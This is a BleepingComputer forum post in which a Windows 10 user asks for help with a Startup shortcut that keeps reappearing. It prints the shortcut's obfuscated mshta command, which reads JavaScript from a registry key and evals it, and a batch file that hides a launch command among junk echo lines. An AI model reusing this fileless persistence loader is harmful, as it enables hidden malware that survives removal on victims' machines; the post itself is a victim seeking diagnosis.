Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Windows 10, odd cmd.exe shortcut in Startup folder, what's it executing?


  • Please log in to reply
No replies to this topic

#1 montejw360

montejw360

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:06:28 AM

Posted 16 December 2016 - 11:28 PM

There is a shortcut in the Startup folder with this as the command line it runs. I've deleted the shortcut and it just reappears within seconds. Rename it and a new one reappears within seconds.
 
C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\software\voxpbs\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"
 
I also found a batch file in my users\me\local folder. The commands it runs is
 
echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9 start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%\9d9b\505f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH
 
I see this being run when the computer boots. It's called by a shortcut names "d178". I see the command window for a short time during the boot process. I've scanned the file "505f.3f751", it comes up no infections so far.
 
If anyone has any ideas on what these are that would be cool. I haven't tried a boot into safe mode yet to see what happens then. I probably will soon.
 
thanks, Monte


BC AdBot (Login to Remove)

 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users